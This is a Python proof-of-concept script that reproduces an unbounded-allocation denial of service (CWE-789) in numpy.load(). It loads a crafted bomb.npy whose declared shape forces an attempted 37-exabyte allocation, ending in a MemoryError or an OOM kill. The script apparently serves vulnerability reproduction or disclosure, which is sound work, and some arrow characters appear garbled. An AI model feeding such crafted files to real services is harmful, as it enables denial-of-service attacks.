| """ |
| NumPy CWE-789 Trigger |
| ====================== |
| Loads bomb.npy and calls numpy.load(), which triggers: |
| read_array() β count = numpy.multiply.reduce(shape) = 4.6e18 |
| β numpy.ndarray(4611686018427387904, dtype=float64) |
| β ~37 exabyte allocation attempt β MemoryError or OOM kill |
| |
| Expected: MemoryError or process kill by OOM killer. |
| """ |
|
|
| import sys, os, numpy as np |
|
|
| npy = os.path.join(os.path.dirname(__file__), 'bomb.npy') |
| if not os.path.exists(npy): |
| print(f"[-] {npy} not found β run make_poc.py first") |
| sys.exit(1) |
|
|
| print(f"[*] numpy version: {np.__version__}") |
| print(f"[*] File: {npy} ({os.path.getsize(npy)} bytes)") |
|
|
| print("[*] Calling numpy.load()...", flush=True) |
| print("[*] Expected: MemoryError or OOM kill from 37 EiB allocation attempt", flush=True) |
|
|
| try: |
| arr = np.load(npy) |
| print(f"[!] Loaded without crash β unexpected: shape={arr.shape}, size={arr.nbytes/1024**4:.1f} TiB") |
| except MemoryError as e: |
| print(f"[+] CRASH: MemoryError β confirmed unbounded allocation from shape (2^31, 2^31): {e}") |
| except Exception as e: |
| print(f"[*] Exception: {type(e).__name__}: {e}") |
| finally: |
| print("[*] Done", flush=True) |
|
|
